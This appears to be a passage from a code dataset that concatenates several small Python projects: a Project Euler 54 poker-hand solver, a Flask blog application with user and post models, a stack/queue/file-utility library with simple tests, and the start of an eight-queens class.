    for line in input_data.readlines():
        # Each line holds ten cards: five for player 1, five for player 2.
        round_playment.set_new_players(line)
        round_playment.play()
print('player {0} won {1} times'.format(round_playment.first_player_name,
                                        round_playment.first_player_winning_count))
print('player {0} won {1} times'.format(round_playment.second_player_name,
                                        round_playment.second_player_winning_count))
| {"/main.py": ["/classes.py"]} |
class RoundPlayment:
    """Plays rounds of two-player poker and tallies wins per player."""

    def __init__(self):
        self.first_player_name = 'John Doe'
        self.first_player_hand = None
        self.first_player_winning_count = 0
        self.second_player_name = 'Jane Doe'
        self.second_player_hand = None
        self.second_player_winning_count = 0

    def set_new_players(self, card_string):
        """Parse one line of ten space-separated cards into the two hands.

        The replace() calls strip a mojibake-encoded UTF-8 BOM ("ï»¿")
        that appears at the start of the input file.
        """
        card_string_array = card_string.strip().replace('ï', '').replace('»', '').replace('¿', '').split(' ')
        self.first_player_hand = PlayerHand(
            player_name=self.first_player_name,
            first_card_string=card_string_array[0],
            second_card_string=card_string_array[1],
            third_card_string=card_string_array[2],
            fourth_card_string=card_string_array[3],
            fifth_card_string=card_string_array[4]
        )
        self.second_player_hand = PlayerHand(
            player_name=self.second_player_name,
            first_card_string=card_string_array[5],
            second_card_string=card_string_array[6],
            third_card_string=card_string_array[7],
            fourth_card_string=card_string_array[8],
            fifth_card_string=card_string_array[9]
        )

    def play(self):
        """Compare combos strongest-first; the first decisive one wins the round."""
        for method_to_call in PlayerHand.methods_to_call:
            winner_found, winner = self._compare_combo(method_to_call)
            if winner_found:
                if winner:
                    if winner.player_name == self.first_player_name:
                        self.first_player_winning_count += 1
                    elif winner.player_name == self.second_player_name:
                        self.second_player_winning_count += 1
                break

    def _compare_combo(self, method_to_call):
        """Evaluate one combo for both hands and decide a winner if possible.

        Returns (winner_found, winning_hand).  When both hands hold the
        combo, tie-break values are compared in priority order; a full tie
        yields (False, None) so a weaker combo gets the chance to decide.
        """
        # shortenings - fp(first player), sp(second player)
        fp_is, fp_first_value, fp_second_value, fp_third_value, fp_fourth_value, fp_fifth_value = getattr(
            self.first_player_hand, method_to_call)()
        fp_values = [fp_first_value, fp_second_value, fp_third_value, fp_fourth_value, fp_fifth_value]
        sp_is, sp_first_value, sp_second_value, sp_third_value, sp_fourth_value, sp_fifth_value = getattr(
            self.second_player_hand, method_to_call)()
        sp_values = [sp_first_value, sp_second_value, sp_third_value, sp_fourth_value, sp_fifth_value]
        if fp_is and sp_is:
            # combo tie braker
            for fp_value, sp_value in zip(fp_values, sp_values):
                if fp_value and sp_value:
                    if fp_value > sp_value:
                        return True, self.first_player_hand
                    elif sp_value > fp_value:
                        return True, self.second_player_hand
            return False, None
        elif fp_is and not sp_is:
            return True, self.first_player_hand
        elif not fp_is and sp_is:
            return True, self.second_player_hand
        # No one wins this combo comparison
        return False, None
class PlayerHand:
    """A five-card poker hand plus the combo detection logic for Euler 54.

    Every ``check_*`` method returns a 6-tuple
    ``(combo_present, tie1, tie2, tie3, tie4, tie5)`` where the tie values
    are integer card ranks in decreasing priority, used to break ties
    between two hands holding the same combo; unused slots are None.

    Bug fixes vs the original implementation:
    - is_flush skipped the second card (iterated hand[2:]).
    - is_royal_flush ignored suits entirely, so a mixed-suit A-K-Q-J-T
      counted as a royal flush.
    - check_two_pairs declared a fifth-card kicker but never computed it.
    - several check_* methods popped from a dict while iterating it,
      which raises RuntimeError on Python 3.
    """

    # Strongest combo first; RoundPlayment walks this list in order.
    methods_to_call = [
        'check_royal_flush',
        'check_straight_flush',
        'check_four_of_a_kind',
        'check_full_house',
        'check_flush',
        'check_straight',
        'check_three_of_a_kind',
        'check_two_pairs',
        'check_pair',
        'check_high_card'
    ]

    def __init__(self, first_card_string, second_card_string, third_card_string,
                 fourth_card_string, fifth_card_string, player_name='Unnamed player'):
        self.player_name = player_name
        self.hand = [
            Card(first_card_string),
            Card(second_card_string),
            Card(third_card_string),
            Card(fourth_card_string),
            Card(fifth_card_string)
        ]

    # -- internal helpers -------------------------------------------------
    def _value_of_count(self, count):
        """Rank (int) of the value occurring exactly ``count`` times, or None."""
        for value, qty in self._get_value_pairs().items():
            if qty == count:
                return Card.values_as_ints[value]
        return None

    def _kickers_excluding(self, count):
        """Ranks of values NOT in the group of size ``count``, high to low."""
        return sorted(
            (Card.values_as_ints[value]
             for value, qty in self._get_value_pairs().items() if qty != count),
            reverse=True)

    # -- combo predicates and tie-break tuples, strongest to weakest ------
    def is_royal_flush(self):
        """Ace-high straight flush: same suit AND exactly the values A K Q J T."""
        return self.is_flush() and set(self.values_list) == {'A', 'K', 'Q', 'J', 'T'}

    def check_royal_flush(self):
        return self.is_royal_flush(), None, None, None, None, None

    def is_straight_flush(self):
        return self.is_flush() and self.is_straight()

    def check_straight_flush(self):
        # The highest card decides between two straight flushes.
        return self.is_straight_flush(), self.values_list_as_ints[0], None, None, None, None

    def is_four_of_a_kind(self):
        return 4 in self._get_value_pairs().values()

    def check_four_of_a_kind(self):
        if not self.is_four_of_a_kind():
            return False, None, None, None, None, None
        quad = self._value_of_count(4)
        kicker = self._kickers_excluding(4)[0]
        return True, quad, kicker, None, None, None

    def is_full_house(self):
        counts = self._get_value_pairs().values()
        return 3 in counts and 2 in counts

    def check_full_house(self):
        if not self.is_full_house():
            return False, None, None, None, None, None
        # Trips rank first, then the pair rank.
        return True, self._value_of_count(3), self._value_of_count(2), None, None, None

    def is_flush(self):
        """All five cards share one suit (fixed: the original skipped card #2)."""
        return len({card.symbol for card in self.hand}) == 1

    def check_flush(self):
        ranks = self.values_list_as_ints
        return self.is_flush(), ranks[0], ranks[1], ranks[2], ranks[3], ranks[4]

    def is_straight(self):
        """Five consecutive ranks, ace high only.

        NOTE: the ace-low straight A-2-3-4-5 is not detected, matching the
        original behaviour of this solver.
        """
        ranks = self.values_list_as_ints  # sorted high to low
        return all(a - b == 1 for a, b in zip(ranks, ranks[1:]))

    def check_straight(self):
        return self.is_straight(), self.values_list_as_ints[0], None, None, None, None

    def is_three_of_a_kind(self):
        return 3 in self._get_value_pairs().values()

    def check_three_of_a_kind(self):
        if not self.is_three_of_a_kind():
            return False, None, None, None, None, None
        # Pad so a full-house hand (one non-trip value) cannot crash here.
        kickers = self._kickers_excluding(3) + [None, None]
        return True, self._value_of_count(3), kickers[0], kickers[1], None, None

    def is_two_pairs(self):
        return list(self._get_value_pairs().values()).count(2) == 2

    def check_two_pairs(self):
        if not self.is_two_pairs():
            return False, None, None, None, None, None
        pair_ranks = sorted(
            (Card.values_as_ints[value]
             for value, qty in self._get_value_pairs().items() if qty == 2),
            reverse=True)
        # Fixed: the fifth-card kicker was previously never computed, so
        # hands with identical pairs could not be separated.
        singleton = self._value_of_count(1)
        return True, pair_ranks[0], pair_ranks[1], singleton, None, None

    def is_pair(self):
        return 2 in self._get_value_pairs().values()

    def check_pair(self):
        is_pair = self.is_pair()
        # Tie-break ranks only make sense for a plain one-pair hand; for
        # stronger pair-based combos an earlier check has already decided,
        # so (matching the original) the tuple carries Nones in that case.
        if not (is_pair and not self.is_full_house() and not self.is_two_pairs()):
            return is_pair, None, None, None, None, None
        kickers = self._kickers_excluding(2)
        return True, self._value_of_count(2), kickers[0], kickers[1], kickers[2], None

    def is_high_card(self):
        return True

    def check_high_card(self):
        ranks = self.values_list_as_ints
        return self.is_high_card(), ranks[0], ranks[1], ranks[2], ranks[3], ranks[4]

    @property
    def winning_text(self):
        return "{0} has won the round".format(self.player_name)

    def _get_value_pairs(self):
        """Map card value letter -> number of occurrences in the hand."""
        value_pairs = {}
        for card in self.hand:
            value_pairs[card.value] = value_pairs.get(card.value, 0) + 1
        return value_pairs

    @property
    def values_list(self):
        return [card.value for card in self.sorted_value_list]

    @property
    def values_list_as_ints(self):
        return [card.value_as_int for card in self.sorted_value_list]

    @property
    def sorted_value_list(self):
        return sorted(self.hand, key=lambda x: x.value_as_int, reverse=True)

    def __repr__(self):
        return "First card: {0},\r\nSecond card: {1},\r\nThird card: {2},\r\nFourth card: {3},\r\nFifth card: {4}"\
            .format(self.hand[0], self.hand[1], self.hand[2], self.hand[3], self.hand[4])
class Card:
    """A single playing card built from a two-character code like "AS".

    The first character is the rank (A - Ace, K - King, Q - Queen,
    J - Jack, T - Ten, 9..2), the second the suit (C - Club, D - Diamond,
    H - Heart, S - Spade).
    """

    # Rank letters mapped to comparable integers (ace high).
    values_as_ints = {
        'A': 14, 'K': 13, 'Q': 12, 'J': 11, 'T': 10,
        '9': 9, '8': 8, '7': 7, '6': 6, '5': 5, '4': 4, '3': 3, '2': 2,
    }

    def __init__(self, card_string):
        self.value, self.symbol = card_string[0], card_string[1]

    @property
    def value_as_int(self):
        """Numeric rank used for sorting and comparisons."""
        return Card.values_as_ints[self.value]

    def __repr__(self):
        return "Card class, Value: {0}, Symbol: {1}".format(self.value, self.symbol)
78,203 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/db_populator.py | import random
from faker import Faker
from flask_blog import db
from flask_blog.models import User, Post
# Seed the blog with ten fake posts, each attributed to a random existing user.
fake = Faker()
for i in range(10):
    author_user = random.choice(User.query.all())
    title = fake.sentence()
    content = ' '.join(fake.paragraphs(3))
    p = Post(user_id=author_user.id, title=title, content=content)
    db.session.add(p)
db.session.commit()  # flush all ten posts in one transaction
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
78,204 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/__init__.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from flask_blog.config import Config
# Extensions are instantiated once at module level, unbound; create_app()
# attaches them to each application instance via init_app().
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'  # endpoint @login_required redirects to
login_manager.login_message_category = 'info'  # Bootstrap alert class for the flash
mail = Mail()
def create_app(config_class=Config):
    """Application factory: build and configure a Flask app instance.

    Bug fix: the configuration was previously loaded from the module-level
    ``Config`` regardless of the argument, so passing a custom class (e.g.
    a test config) had no effect.  ``config_class`` is now honoured; the
    default keeps the old behaviour.
    """
    app = Flask(__name__)
    app.config.from_object(config_class)
    db.init_app(app)
    bcrypt.init_app(app)
    login_manager.init_app(app)
    mail.init_app(app)
    # Blueprints are imported here (not at module top) to avoid circular
    # imports: the route modules themselves import from flask_blog.
    from flask_blog.users.routes import users as users_bp
    from flask_blog.posts.routes import posts as posts_bp
    from flask_blog.main.routes import main as main_bp
    from flask_blog.errors.handlers import errors as errors_bp
    app.register_blueprint(users_bp)
    app.register_blueprint(posts_bp)
    app.register_blueprint(main_bp)
    app.register_blueprint(errors_bp)
    return app
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
78,205 | tyronedamasceno/flask-blog | refs/heads/master | /flask_blog/models.py | from datetime import datetime
from flask import current_app
from itsdangerous import (
SignatureExpired, TimedJSONWebSignatureSerializer as Serializer
)
from flask_blog import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: reload a User from the session-stored id."""
    return User.query.get(int(user_id))
class User(db.Model, UserMixin):
    """Account model; UserMixin supplies Flask-Login's required properties."""
    id = db.Column(
        db.Integer,
        primary_key=True
    )
    username = db.Column(
        db.String(20),
        unique=True,
        nullable=False
    )
    email = db.Column(
        db.String(100),
        unique=True,
        nullable=False
    )
    # Avatar filename; new accounts start with the bundled default image.
    image_file = db.Column(
        db.String(20),
        nullable=False,
        default='default.jpg'
    )
    # Password hash (60 chars — presumably bcrypt via the app's Bcrypt
    # extension; never the plain password).
    password = db.Column(
        db.String(60),
        nullable=False
    )
    posts = db.relationship(
        'Post',
        backref='author',
        lazy=True
    )

    def get_reset_token(self, expires_sec=1800):
        """Return a signed, time-limited (default 30 min) password-reset token."""
        s = Serializer(current_app.config['SECRET_KEY'], expires_sec)
        return s.dumps({'user_id': self.id}).decode('utf-8')

    @staticmethod
    def verify_reset_token(token):
        """Return the User a valid token refers to, or None when it expired.

        NOTE(review): only SignatureExpired is caught; a *tampered* token
        raises itsdangerous.BadSignature, which would propagate to the
        caller — confirm whether that is intended.
        """
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            user_id = s.loads(token)['user_id']
        except SignatureExpired:
            return None
        return User.query.get(user_id)

    def __repr__(self):
        return f'User("{self.username}", "{self.email}", "{self.image_file}")'
class Post(db.Model):
    """Blog post; linked to its author via the 'user.id' foreign key."""
    id = db.Column(
        db.Integer,
        primary_key=True
    )
    title = db.Column(
        db.String(100),
        nullable=False
    )
    date_posted = db.Column(
        db.DateTime,
        nullable=False,
        default=datetime.utcnow  # give the function as argument
    )
    content = db.Column(
        db.Text,
        nullable=False
    )
    user_id = db.Column(
        db.Integer,
        db.ForeignKey('user.id'),
        nullable=False
    )

    def __repr__(self):
        return f'Post("{self.title}", "{self.date_posted}")'
| {"/flask_blog/db_populator.py": ["/flask_blog/__init__.py", "/flask_blog/models.py"], "/flask_blog/models.py": ["/flask_blog/__init__.py"]} |
class Stack:
    """A minimal LIFO stack backed by a Python list (top = end of list).

    Note: because isEmpty() is defined via peek(), a stack whose only item
    is None reports itself empty — preserved from the original interface.
    """

    def __init__(self):
        self.stack = []

    def isEmpty(self):
        """True when there is nothing to pop."""
        return self.peek() is None  # idiom fix: 'is None', not '== None'

    def peek(self):
        """Return the top item without removing it, or None when empty."""
        if not self.stack:
            return None
        return self.stack[-1]

    def pop(self):
        """Remove and return the top item; returns None on an empty stack."""
        if not self.isEmpty():
            return self.stack.pop()
        return None  # explicit, instead of falling off the end

    def sizeOf(self):
        """Number of items currently on the stack."""
        return len(self.stack)

    def push(self, *values):
        """Push the values in order; returns self so calls can be chained."""
        for value in values:
            self._push(value)
        return self

    def _push(self, item):
        self.stack.append(item)

    def toArray(self):
        """Bottom-to-top list copy; callers cannot mutate internal state."""
        return self.stack[:]

    def toString(self):
        return str(self.stack)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
class TestEngine:
    """Tiny test runner: executes a list of zero-argument test callables.

    Each test returns True (pass) or False (fail).  Optional preTests /
    postTests hooks run once before / after the whole suite.
    """

    def __init__(self, name, tests, preTests=None, postTests=None):
        self.name = name
        self.preTests = preTests
        self.postTests = postTests
        self.tests = tests

    def runTests(self):
        """Run every test, print each failure by function name, then a summary."""
        failedTests = 0
        testsNumber = len(self.tests)
        if self.preTests is not None:
            self.preTests()
        for test in self.tests:
            # Only an explicit False counts as a failure (original semantics).
            if test() == False:
                failedTests += 1
                print("'" + test.__name__ + "'", "test", "failed")
        print(self.name + " test passed -",
              testsNumber - failedTests, "/", testsNumber)
        if self.postTests is not None:
            self.postTests()

    def addTest(self, test):
        """Append one test callable to the suite."""
        self.tests.append(test)

    def removeTest(self, test):
        """Remove one test callable from the suite (no-op if absent).

        Bug fix: the old body shadowed the argument in a loop and merely
        printed every registered test instead of removing anything.
        """
        if test in self.tests:
            self.tests.remove(test)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,212 | mhmdmar/Python_Utils | refs/heads/master | /QueueTests.py | from Queue import Queue
from TestEngine import TestEngine
# Each test returns True on pass, False on failure (including any raised
# exception).  Fixes vs the original file: the bare `except:` clauses are
# narrowed to `except Exception:` (a bare except also swallows SystemExit /
# KeyboardInterrupt) and the `return` statements inside `finally` blocks —
# which silently discard in-flight exceptions — are replaced with plain
# returns.  Observable pass/fail behaviour is unchanged.

def toStringTest():
    try:
        queue = Queue()
        queue.enqueue(1).enqueue(2).enqueue(3)
        return queue.toString() == "[3, 2, 1]"
    except Exception:
        return False

def toArrayTest():
    try:
        queue = Queue()
        queue.enqueue(1).enqueue(2).enqueue(3)
        return queue.toArray() == [3, 2, 1]
    except Exception:
        return False

def isEmptyTest():
    try:
        queue = Queue()
        queue.enqueue(1).enqueue(2).enqueue(3)
        queue.dequeue()
        queue.dequeue()
        queue.dequeue()
        return queue.isEmpty() == True
    except Exception:
        return False

def queueTest():
    try:
        queue = Queue()
        queue.enqueue(1)
        queue.enqueue(2)
        return queue.toString() == "[2, 1]"
    except Exception:
        return False

def queueChainTest():
    try:
        queue = Queue()
        queue.enqueue(1).enqueue(2).enqueue(3).enqueue(4)
        return queue.toString() == "[4, 3, 2, 1]"
    except Exception:
        return False

def multipleQueueTest():
    try:
        queue = Queue()
        queue.enqueue(1, 2, 3)
        return queue.toString() == "[3, 2, 1]"
    except Exception:
        return False

def peekTest1():
    try:
        queue = Queue()
        return queue.peek() == None
    except Exception:
        return False

def peekTest2():
    try:
        queue = Queue()
        queue.enqueue(2)
        return queue.peek() == 2
    except Exception:
        return False

def sizeTest():
    try:
        queue = Queue()
        queue.enqueue(2)
        return queue.sizeOf() == 1
    except Exception:
        return False

def getTests():
    """All test callables, in the order the engine should run them."""
    return [toStringTest, toArrayTest, multipleQueueTest, queueTest,
            queueChainTest, isEmptyTest, peekTest1, peekTest2, sizeTest]

def main():
    testEngine = TestEngine("Queue", getTests())
    testEngine.runTests()

main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
class Queue:
    """A minimal FIFO queue backed by a Python list.

    Items are appended at the back (end of the list); the front is index 0.
    Bug fix: dequeue() previously popped from the *back* (LIFO) while
    peek() looked at the front, so the two methods disagreed about which
    item was next.  dequeue now removes the front item, matching peek().
    (collections.deque would make both ends O(1); the list is kept for the
    original interface.)
    """

    def __init__(self):
        self.queue = []

    def isEmpty(self):
        return self.queue == []

    def enqueue(self, *items):
        """Add items at the back, in order; returns self for chaining."""
        for item in items:
            self._enqueue(item)
        return self

    def _enqueue(self, item):
        self.queue.append(item)

    def dequeue(self):
        """Remove and return the item at the front of the queue."""
        return self.queue.pop(0)

    def sizeOf(self):
        return len(self.queue)

    def toArray(self):
        """Copy of the contents, newest first (matches toString())."""
        return self.queue[::-1]

    def toString(self):
        return str(self.toArray())

    def peek(self):
        """Return the front item (next to be dequeued) without removing it."""
        if self.isEmpty():
            return None
        return self.queue[0]
78,214 | mhmdmar/Python_Utils | refs/heads/master | /FilesTests.py | import os
from Files import Files
from TestEngine import TestEngine
files = Files()
def createDirectoryTest():
    # _createDirectory must build every missing folder on the path.
    files._createDirectory("./AA/BB/CC")
    return os.path.exists("./AA/BB/CC")


def copyDirectoryTest():
    # Copying from a nonexistent source must raise FileNotFoundError.
    # Fix: dropped the return-in-finally, which silently converted any
    # unexpected exception into a plain failure.
    testPass = False
    try:
        files.copyDirectory("./AA/BB/CC/fff/f.js", "./AA/BB/CC/fff/f.js")
    except FileNotFoundError:
        testPass = True
    return testPass


def splitPathTest():
    # _splitPath should break the path into its four components.
    foldersArr, foldersLen = files._splitPath("AA/BB/CC/ff.js", True)
    return (foldersLen == 4 and foldersArr[0] == "AA" and foldersArr[1] == "BB"
            and foldersArr[2] == "CC" and foldersArr[3] == "ff.js")
# (removed a stray, unused module-level `testPass = False` left over from editing)
def pathIncludesFileTest1():
    # A pure directory path contains no file component.
    return files._pathIncludesAFile("./AA/BB/CC") == False


def fixSeperatorTets():
    # Forward- and back-slash spellings normalise to the same path.
    slash = files._fixSeperators("./AA/BB")
    backSlash = files._fixSeperators(".\\AA\\BB")
    return slash == backSlash


def pathIncludesFileTest2():
    # A path ending in a file name is recognised as containing a file.
    return files._pathIncludesAFile("./AA/BB/CC/ff.txt") == True


def appendFileToPathTest():
    # The source file name is appended as the fourth path component.
    result = files._appendFileToPath(
        "./AA/BB/CC/ff.js", "./AA/BB").split(files.seperator)
    return len(result) == 4 and result[3] == "ff.js"


def appendFileToPathTest2():
    # Appending when the source has no file must raise ValueError.
    # Fix: dropped return-in-finally so unexpected exceptions propagate.
    testPassed = False
    try:
        files._appendFileToPath("./AA/BB/CC", "./AA/BB").split(files.seperator)
    except ValueError:
        testPassed = True
    return testPassed


def appendFileToPathTest3():
    # Appending when the destination already names a file must raise ValueError.
    testPassed = False
    try:
        files._appendFileToPath(
            "./AA/BB/CC/ff.js", "./AA/BB/ff.js").split(files.seperator)
    except ValueError:
        testPassed = True
    return testPassed
def copyFileTest():
    """Copying onto itself (same directory, same name) must raise ValueError."""
    testPassed = False
    try:
        files.copyFile("./ff.txt", "./")
    except ValueError:
        testPassed = True
    return testPassed


def copyFileTest2():
    """Copy to the same directory under a different name succeeds."""
    try:
        files.copyFile("./ff.txt", "./aa.txt")
        return os.path.exists("./aa.txt")
    except ValueError:
        return False


def copyFileTest3():
    """Copy into a directory keeps the original file name."""
    try:
        files.copyFile("./ff.txt", "./AA/BB/CC")
        return os.path.exists("./AA/BB/CC/ff.txt")
    except Exception:
        # Fix: narrowed from a bare `except:`.
        return False


def copyFileTest4():
    """Copy to an explicit destination path and name."""
    try:
        files.copyFile("./ff.txt", "./AA/BB/CC/aa.txt")
        return os.path.exists("./AA/BB/CC/aa.txt")
    except Exception:
        return False


def copyFileTest5():
    """A source path without a file component must raise ValueError."""
    testPassed = False
    try:
        files.copyFile("./AA", "./AA/BB/CC/aa.txt")
    except ValueError:
        testPassed = True
    return testPassed


def copyFileTest6():
    """A missing source file must raise FileNotFoundError."""
    testPassed = False
    try:
        files.copyFile("./AA/savsabvsabvabva.txt", "./AA/BB/CC/aa.txt")
    except FileNotFoundError:
        testPassed = True
    return testPassed
def preTests():
    # Fixture: guarantee the working tree and the empty sample file exist.
    if not os.path.exists("./AA/BB/CC"):
        os.makedirs("./AA/BB/CC")
    with open("./ff.txt", "w") as file:
        file.write("")


def postTests():
    # Teardown: remove fixtures. Fix: guard each removal — a failed
    # copyFileTest2 leaves no aa.txt and the old unconditional os.remove
    # crashed the teardown with FileNotFoundError.
    files.removeDirectory("./AA")
    for leftover in ("./ff.txt", "./aa.txt"):
        if os.path.exists(leftover):
            os.remove(leftover)


def getTests():
    # Every Files test, in execution order.
    return [createDirectoryTest, copyDirectoryTest, splitPathTest,
            pathIncludesFileTest1, pathIncludesFileTest2, appendFileToPathTest,
            appendFileToPathTest2, appendFileToPathTest3, fixSeperatorTets,
            copyFileTest, copyFileTest2, copyFileTest3, copyFileTest4,
            copyFileTest5, copyFileTest6]


def main():
    # Run the suite with setup/teardown hooks through the shared harness.
    testEngine = TestEngine("Files", getTests(), preTests, postTests)
    testEngine.runTests()


main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,215 | mhmdmar/Python_Utils | refs/heads/master | /Files.py | import os
import shutil
class Files:
    """Helpers around os/shutil for copying files and directory trees.

    NOTE: the misspelled attribute name `seperator` is preserved because
    external code (FilesTests) reads it.
    """

    def __init__(self):
        self.seperator = os.path.sep

    def copyDirectory(self, source, dest):
        """Recursively copy directory *source* into *dest*.

        Raises FileNotFoundError when *source* does not exist.
        """
        if not os.path.exists(source):
            raise FileNotFoundError("Source directory doesn't' exists")
        self._copyDirectory(source, dest)

    def _copyDirectory(self, source, dest):
        # Copy every entry; recurse into subdirectories, and only overwrite a
        # file when the source is meaningfully newer (>1s mtime difference).
        if not os.path.exists(dest):
            os.makedirs(dest)
        for file in os.listdir(source):
            s = os.path.join(source, file)
            d = os.path.join(dest, file)
            if os.path.isdir(s):
                # Bug fix: the original called the undefined bare name
                # `copyDirectory` here (NameError) and additionally re-invoked
                # self._copyDirectory(source, dest) unconditionally after the
                # loop, recursing forever.
                self._copyDirectory(s, d)
            else:
                if not os.path.exists(d) or os.stat(s).st_mtime - os.stat(d).st_mtime > 1:
                    shutil.copyfile(s, d)

    def removeDirectory(self, target):
        """Delete *target* and everything under it, if it exists."""
        if os.path.exists(target):
            self._removeDirectory(target)

    def _removeDirectory(self, target):
        shutil.rmtree(target)

    def _fixSeperators(self, path):
        """Return *path* with both '/' and '\\' changed to the OS separator."""
        return path.replace("\\", self.seperator).replace(
            "/", self.seperator)

    def _splitPath(self, path, includeFile=True):
        """Split *path* into (components, count).

        When includeFile is False and the path ends in a file name, the file
        is excluded from the count (but stays in the list).
        """
        foldersArr = self._fixSeperators(path).split(self.seperator)
        foldersLen = len(foldersArr)
        # ignore the last part of the path if it represents a file
        if includeFile == False and self._pathIncludesAFile(path) == True:
            foldersLen -= 1
        return foldersArr, foldersLen

    def _createDirectory(self, path):
        """Create every missing directory along *path* (file part ignored)."""
        foldersArr, foldersLen = self._splitPath(path, False)
        newPath = ""
        for i in range(foldersLen):
            # Bug fix: original appended a hard-coded backslash, producing
            # bogus single-name directories on POSIX systems.
            newPath += foldersArr[i] + self.seperator
            if not os.path.exists(newPath):
                os.makedirs(newPath)

    def _pathIncludesAFile(self, path):
        """True when the last path component looks like a file (contains '.')."""
        path = self._fixSeperators(path)
        foldersArr, foldersLen = self._splitPath(path)
        return foldersArr[foldersLen-1].find(".") != -1

    def _appendFileToPath(self, source, dest):
        """Append *source*'s file name onto directory path *dest*."""
        if self._pathIncludesAFile(dest) == True:
            raise ValueError(
                "Destination path already includes a file")
        if self._pathIncludesAFile(source) == False:
            raise ValueError(
                "Source doesn't include a file to append to dest argumnet")
        foldersArr, foldersLen = self._splitPath(source, True)
        dest = self._fixSeperators(dest)
        if not (dest[len(dest)-1] == self.seperator):
            dest += self.seperator
        dest += foldersArr[foldersLen-1]
        return dest

    def copyFile(self, source, dest):
        """Copy a single file, creating destination directories as needed.

        Raises ValueError for directory sources or same-path copies, and
        FileNotFoundError when *source* is missing.
        """
        source = self._fixSeperators(source)
        dest = self._fixSeperators(dest)
        if self._pathIncludesAFile(source) == False:
            raise ValueError(
                "Source doesn't include a file to copy, use copyDirectory instead")
        if not os.path.exists(source):
            raise FileNotFoundError("Source file doesn't exists")
        if self._pathIncludesAFile(dest) == False:
            dest = self._appendFileToPath(source, dest)
        if source == dest:  # never copy a file onto itself
            raise ValueError(
                "Copying the file with the same name to the same directory!")
        self._createDirectory(dest)
        shutil.copyfile(source, dest)
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,216 | mhmdmar/Python_Utils | refs/heads/master | /Tests.py | from StackTests import main
from QueueTests import main
from FilesTests import main
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,217 | mhmdmar/Python_Utils | refs/heads/master | /StackTests.py | from Stack import Stack
from TestEngine import TestEngine
def toStringTest():
    """Pushed order 1,2,3 renders as "[1, 2, 3]"."""
    try:
        stack = Stack()
        stack.push(1).push(2).push(3)
        testPass = stack.toString() == "[1, 2, 3]"
    except Exception:
        # Fix: narrowed from a bare `except:` + return-in-finally.
        testPass = False
    return testPass


def toArrayTest():
    """toArray() mirrors the pushed contents."""
    try:
        stack = Stack()
        stack.push(1).push(2).push(3)
        # Bug fix: the original computed this comparison and threw the result
        # away (testPass was pre-set to True), so the test could never fail.
        testPass = stack.toArray() == [1, 2, 3]
    except Exception:
        testPass = False
    return testPass


def isEmptyTest():
    """A stack drained by three pops must report empty."""
    try:
        stack = Stack()
        stack.push(1).push(2).push(3)
        stack.pop()
        stack.pop()
        stack.pop()
        testPass = stack.isEmpty() == True
    except Exception:
        testPass = False
    return testPass
def peekTest1():
    """peek() on an empty stack returns None."""
    try:
        stack = Stack()
        testPass = stack.peek() == None
    except Exception:
        # Fix: narrowed from a bare `except:` + return-in-finally.
        testPass = False
    return testPass


def peekTest2():
    """peek() returns the top element without removing it."""
    try:
        stack = Stack()
        stack.push(2)
        testPass = stack.peek() == 2
    except Exception:
        testPass = False
    return testPass


def sizeTest():
    """sizeOf() counts the pushed elements."""
    try:
        stack = Stack()
        stack.push(2)
        testPass = stack.sizeOf() == 1
    except Exception:
        testPass = False
    return testPass
def getTests():
    """All stack test callables, in execution order."""
    suite = [toStringTest, toArrayTest]
    suite += [isEmptyTest, peekTest1, peekTest2, sizeTest]
    return suite


def main():
    # Hand the suite to the shared harness and run it.
    TestEngine("Stack", getTests()).runTests()


main()
| {"/QueueTests.py": ["/Queue.py", "/TestEngine.py"], "/FilesTests.py": ["/Files.py", "/TestEngine.py"], "/Tests.py": ["/StackTests.py", "/QueueTests.py", "/FilesTests.py"], "/StackTests.py": ["/Stack.py", "/TestEngine.py"]} |
78,223 | Me-TheKing/8Queen | refs/heads/main | /queen.py | class Queen:
    def __init__(self, y, x, board_size):
        # (y, x) is the queen's square; coordinates are zero-based and the
        # board spans [self.min, self.max) on both axes.
        self.x = x
        self.y = y
        self.max = board_size
        self.min = 0

    def right(self):
        # Squares to the right of the queen on its row.
        return [(self.y, r) for r in range(self.x+1, self.max)]

    def left(self):
        # Squares to the left of the queen on its row (x-1 down to 0).
        return [(self.y, l-1) for l in range(self.x, self.min, -1)]

    def hor(self):
        # Every other square on the queen's row.
